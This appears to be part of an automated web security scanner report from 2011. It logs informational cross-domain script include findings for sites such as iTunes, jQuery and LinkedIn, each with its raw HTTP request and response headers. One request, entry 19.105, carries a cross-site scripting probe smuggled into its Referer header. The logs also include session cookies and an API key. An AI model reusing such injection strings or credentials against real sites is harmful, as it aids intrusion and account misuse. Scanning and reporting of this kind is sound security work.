Host:   http://itunes.apple.com
Path:   /us/artist/the-beatles/id136975

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/artist/the-beatles/id136975 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:47:59 GMT
x-apple-lok-response-date: Thu Feb 03 09:51:21 PST 2011
x-apple-lok-current-storefront: <null>
x-apple-orig-url-path: /us/artist/the-beatles/id136975
x-apple-application-site: CUP
Content-Type: text/html
x-apple-lok-expire-date: Thu Feb 03 09:51:59 PST 2011
x-apple-lok-stor: memcached
x-apple-max-age: 3600
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewArtist?cc=us&id=136975
x-apple-application-instance: 5113
x-apple-lok-path: v0_1:MZStore/viewArtist&cc=us&id=136975-143441,pc-8-Ak
x-apple-aka-ttl: Generated Thu Feb 03 09:51:21 PST 2011, Expires Thu Feb 03 09:52:21 PST 2011, TTL 60s
x-apple-lok-ttl: Generated Thu Feb 03 09:47:59 PST 2011, Expires Thu Feb 03 09:51:59 PST 2011, TTL 240s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=7
Date: Thu, 03 Feb 2011 17:52:14 GMT
Connection: close
Connection: Transfer-Encoding
X-Apple-Partner: origin.0
Content-Length: 65751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<!-- parent component = "SEOHUberArti
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-previewRegionSensitive.jsz"></script>
...[SNIP]...

19.90. http://itunes.apple.com/us/browse/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/browse/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/browse/ HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:51:22 GMT
x-apple-orig-url-path: /us/browse/
x-apple-application-site: CUP
x-apple-max-age: 3600
Content-Type: text/html
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/browse?cc=us
x-apple-application-instance: 560
x-apple-aka-ttl: Generated Thu Feb 03 09:51:22 PST 2011, Expires Thu Feb 03 09:52:22 PST 2011, TTL 60s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=8
Date: Thu, 03 Feb 2011 17:52:14 GMT
Connection: close
Connection: Transfer-Encoding
X-Apple-Partner: origin.0
Content-Length: 49467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<!-- parent component = "SEOHBrowsePa
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...

19.91. http://itunes.apple.com/us/genre/mobile-software-applications/id36  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/genre/mobile-software-applications/id36

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/genre/mobile-software-applications/id36 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:51:22 GMT
x-apple-orig-url-path: /us/genre/mobile-software-applications/id36
x-apple-application-site: CUP
x-apple-max-age: 3600
Content-Type: text/html
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewGenre?cc=us&id=36
x-apple-application-instance: 530
x-apple-aka-ttl: Generated Thu Feb 03 09:51:22 PST 2011, Expires Thu Feb 03 09:52:22 PST 2011, TTL 60s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=10
Date: Thu, 03 Feb 2011 17:52:14 GMT
Content-Length: 18017
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>
<!-- parent component = "SEOHBrowsePa
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...

19.92. http://itunes.apple.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/store

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/store HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:52:14 GMT
x-apple-orig-url-path: /us/store
x-apple-application-site: CUP
Content-Type: text/html; charset=utf-8
x-apple-asset-version: 82804
x-apple-application-instance: 5105
x-apple-max-age: 3600
x-apple-lokamai-no-cache: true
x-apple-request-store-front: <null>
x-apple-date-generated: Thu, 03 Feb 2011 17:52:14 GMT
x-apple-aka-ttl: Generated Thu Feb 03 09:52:14 PST 2011, Expires Thu Feb 03 09:52:14 PST 2011, TTL 0s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/storeFront?cc=us
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=0
Date: Thu, 03 Feb 2011 17:52:14 GMT
Content-Length: 4754
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">

<HTML>
<HEAD>
<TITLE>Connecting to the iTunes Store.</TITLE>
<META name="description" content="Connecting to the iTunes Store."></META>

...[SNIP]...
</META>

<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://ax.phobos.apple.com.edgesuite.net/htmlResources/ED2D/web-storefront-preview.jsz"></script>
...[SNIP]...

19.93. http://jquery.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:23 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 31 Jan 2011 15:06:39 GMT
ETag: "7520fc2-3ea2-c344bdc0"
Accept-Ranges: bytes
Content-Length: 16034
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

19.94. http://jquery.org/license  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.org
Path:   /license

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /license HTTP/1.1
Host: jquery.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:33:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 03 Feb 2011 20:31:20 GMT
ETag: "79985e2-206a-a5f35600"
Accept-Ranges: bytes
Content-Length: 8298
Cache-Control: max-age=300, must-revalidate
Expires: Thu, 03 Feb 2011 20:38:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.jquery.com/org/style.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

19.95. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 19:47:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

19.96. http://jqueryui.com/themeroller/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 22:06:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117007

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...

19.97. http://mad4milk.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mad4milk.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: mad4milk.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:05 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2264dc0b4145e45d69276a4c3c70a5981e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1296762487%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Thu, 03-Feb-2011 21:48:07 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-e
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="/assets/styles/style.css" />
   
   <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

19.98. http://malsup.com/jquery/block/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/block/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jquery/block/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:23 GMT
Server: mod_security2/2.5.7
Last-Modified: Thu, 23 Sep 2010 10:36:33 GMT
ETag: "10ce2c6-74e8-490ead5f20e40"
Accept-Ranges: bytes
Content-Length: 29928
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>jQuery BlockUI Plugin (v2)</title>
<link rel="stylesheet" type="text/css" media="screen" h
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="block.css?v3" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://github.com/malsup/blockui/raw/master/jquery.blockUI.js?v2.34"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

19.99. http://managedq.com/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://managedq.com
Path:   /search.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search.php HTTP/1.1
Host: managedq.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13502
Connection: close
Content-Type: text/html


<head>
   <base href="http://managedq.com/">    
<script src="http://www.google.com/jsapi?key=ABQIAAAAfY9R5yZEX7c7fNMc_53H-RSS93VGBhy0VH-F4ConCm_atGP3gxQMWmXfPasKYusJ-dKLng0cAOqm0g" type="text/javascript"></script>
...[SNIP]...

19.100. http://maps.google.com/maps/stk/lc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/stk/lc

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /maps/stk/lc?client=ca-pub-3033999741136561&lc_format=map_inset_ad&ll=41.946689%2C-87.722974&spn=0.009576%2C0.017166&z=15&ads_params=format%3A125x125_as%2Coutput%3Ahtml%2Ch%3A125%2Cw%3A125%2Clmt%3A1296808492%2Cchannel%3A5653360264%2Cad_type%3Atext%2Ccolor_bg%3Ac4d4f3%2Ccolor_border%3Ae5ecf9%2Ccolor_line%3Ac4d4f3%2Ccolor_link%3A0000cc%2Cflash%3A10.1.103%2Curl%3Ahttp%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2Cadsafe%3Ahigh%2Cuiv%3A1%2Cdt%3A1296786892544%2Cshv%3Ar20100101%2Cjsv%3Ar20100101%2Ccorrelator%3A1296786883899%2Cfrm%3A0%2Cadk%3A3364239293%2Cga_vid%3A371918977.1296786866%2Cga_sid%3A1296786866%2Cga_hid%3A132698905%2Cga_fc%3A1%2Cu_tz%3A-360%2Cu_his%3A3%2Cu_java%3A1%2Cu_h%3A1200%2Cu_w%3A1920%2Cu_ah%3A1156%2Cu_aw%3A1920%2Cu_cd%3A16%2Cu_nplug%3A9%2Cu_nmime%3A44%2Cbiw%3A1033%2Cbih%3A1012%2Cfu%3A0%2Cjs%3Auds%2Ceid%3A37464000%2Chl%3Aen HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:33:58 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: maps-stickers
X-XSS-Protection: 1; mode=block
Content-Length: 11529

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000cc;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.101. http://mootools.net/developers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mootools.net
Path:   /developers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /developers/ HTTP/1.1
Host: mootools.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 14931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-e
...[SNIP]...
<!-- Google Analytics -->
   
   <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/6310.js"> </script>
...[SNIP]...

19.102. http://nowhiringtoday.jobamatic.com/a/jobs/find-jobs/q-Honda+Research+Development+America/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nowhiringtoday.jobamatic.com
Path:   /a/jobs/find-jobs/q-Honda+Research+Development+America/x22

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a/jobs/find-jobs/q-Honda+Research+Development+America/x22 HTTP/1.1
Host: nowhiringtoday.jobamatic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Feb 2011 20:33:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: gc=1; expires=Fri, 04-Feb-2011 20:33:43 GMT; path=/
Set-Cookie: sess=ct%3D4d4b1127; path=/; domain=nowhiringtoday.jobamatic.com
Set-Cookie: sh3=id%3D9519651854d4b1127cc09b6.50218783%3Brv%3D5d4641dd%3Bcv%3D2; expires=Sat, 04-Feb-2012 20:33:43 GMT; path=/; domain=nowhiringtoday.jobamatic.com
Set-Cookie: sh2=cso%3D4d4b1127%3Bslu%3D0%3Bref%3Dsh; expires=Sat, 04-Feb-2012 20:33:43 GMT; path=/; domain=nowhiringtoday.jobamatic.com
Set-Cookie: shabts=none; expires=Mon, 04-Apr-2011 20:33:45 GMT; path=/; domain=nowhiringtoday.jobamatic.com
Set-Cookie: shut=deleted; expires=Wed, 03-Feb-2010 20:33:44 GMT; path=/
Set-Cookie: shmk=deleted; expires=Wed, 03-Feb-2010 20:33:44 GMT; path=/
Set-Cookie: shup=fvt%3D4d4b1127%26ncs%3D1%26lst%3D4d4b1129; expires=Sat, 05-Mar-2011 20:33:45 GMT; path=/
Cache-Control: no-cache, must-revalidate
Content-Length: 43053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="html" dir="ltr" xml:lang="en" lang="en" xmlns="http://www.w3.org/199
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.103. http://opensource.org/licenses/lgpl-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opensource.org
Path:   /licenses/lgpl-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/lgpl-license.php HTTP/1.1
Host: opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:49:57 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESSe6df14a6557d381f7820d30df9723b5b=c3sfkjibjtrtb256rtno58s211; expires=Sat, 26-Feb-2011 23:23:17 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 03 Feb 2011 19:46:16 GMT
ETag: "d39634045e5eb23dc4c9c24e32c8a468"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 6921
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.104. http://opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:50:00 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESSe6df14a6557d381f7820d30df9723b5b=ljh26ohmvvnl63npbjcqcrvk23; expires=Sat, 26-Feb-2011 23:23:20 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 03 Feb 2011 19:46:17 GMT
ETag: "75b452b371f037c225405bd71e3aff0a"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.105. http://pagead2.googlesyndication.com/pagead/s/iframes_api_loader.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/s/iframes_api_loader.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/s/iframes_api_loader.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pagead2.googlesyndication.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/html; charset=UTF-8
Last-Modified: Tue, 12 Oct 2010 18:46:38 GMT
Date: Thu, 03 Feb 2011 19:09:34 GMT
Expires: Fri, 04 Feb 2011 19:09:34 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 26785
Cache-Control: public, max-age=86400
Content-Length: 124

<html>
<body>
<script src="https://ssl.gstatic.com/gb/js/gcm_392279366d8656daff9da175563f505a.js"></script>
</body>
</html>

19.106. http://prototypejs.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://prototypejs.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: prototypejs.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:50:04 GMT
Server: Apache/2.2.2 (FreeBSD) mod_ssl/2.2.2 OpenSSL/0.9.8b DAV/2 PHP/5.1.4 SVN/1.3.2 mod_vd/2.0 mod_fastcgi/2.4.2 proxy_html/2.5 Phusion_Passenger/2.1.0
Vary: Host,Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 15:31:50 GMT
ETag: "4ce9bf-1937-59038580"
Accept-Ranges: bytes
Content-Length: 6455
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.107. http://qa.linkedin.com/pub/smart-devil/19/697/322/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://qa.linkedin.com
Path:   /pub/smart-devil/19/697/322/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pub/smart-devil/19/697/322/x22 HTTP/1.1
Host: qa.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: bcookie="v=1&f06c167d-8118-455e-944d-937f03c4ba49"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:47:48 GMT; Path=/
Last-Modified: Fri, 12 Mar 2010 22:11:19 GMT
If-Modified-Since: Fri, 12 Mar 2010 22:11:19 GMT
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 20:33:42 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</script>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
